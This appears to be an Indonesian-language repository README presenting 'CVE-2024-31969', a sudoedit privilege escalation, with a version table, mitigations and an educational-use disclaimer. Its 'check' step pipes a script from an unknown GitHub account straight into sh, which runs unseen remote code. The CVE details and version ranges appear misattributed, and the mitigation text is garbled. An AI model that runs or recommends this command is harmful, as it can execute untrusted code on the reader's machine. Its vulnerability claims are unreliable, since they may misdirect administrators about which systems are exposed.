CVE-2024-31969 adalah kerentanan local privilege escalation pada sudo ketika menggunakan perintah sudoedit.
Kerentanan ini diperkenalkan sejak sudo 1.9.0 karena cara sudoedit memvalidasi environment variable pengguna dan kepemilikan file yang kurang tepat.
A flaw introduced in sudo 1.9.0 in how
sudoeditvalidated users' environment variables and file ownership.
Kerentanan ini memungkinkan user lokal dengan akses sudoedit untuk memodifikasi file arbitrary sebagai root melalui manipulasi environment variable seperti SUDO_EDITOR, atau dengan memanfaatkan symlink.
| Versi Sudo | Status |
|---|---|
| 1.9.0 → 1.9.15p4 | 🔥 Rentan |
| 1.9.15p5 ke atas | ✅ Aman |
| 1.8.x (termasuk 1.8.23) | ❌ Tidak terdampak |
Jalankan perintah berikut:
curl -L https://raw.githubusercontent.com/kingfakee7/CVE-2024-31969/main/cve-2024-31969-check.sh | sh
sudo ke versi 1.9.15p5 atau yang lebih baru.sudoers yang memperbolehkan sudoedit untuk user non-root.env_keep atau env_reset yang aman dalam file /etc/sudoers.Repository ini dibuat untuk tujuan edukasi dan dokumentasi keamanan sistem.
Dilarang keras menggunakan informasi ini untuk aktivitas ilegal atau tanpa izin tertulis dari pemilik sistem.
Segala bentuk penyalahgunaan sepenuhnya di luar tanggung jawab pembuat.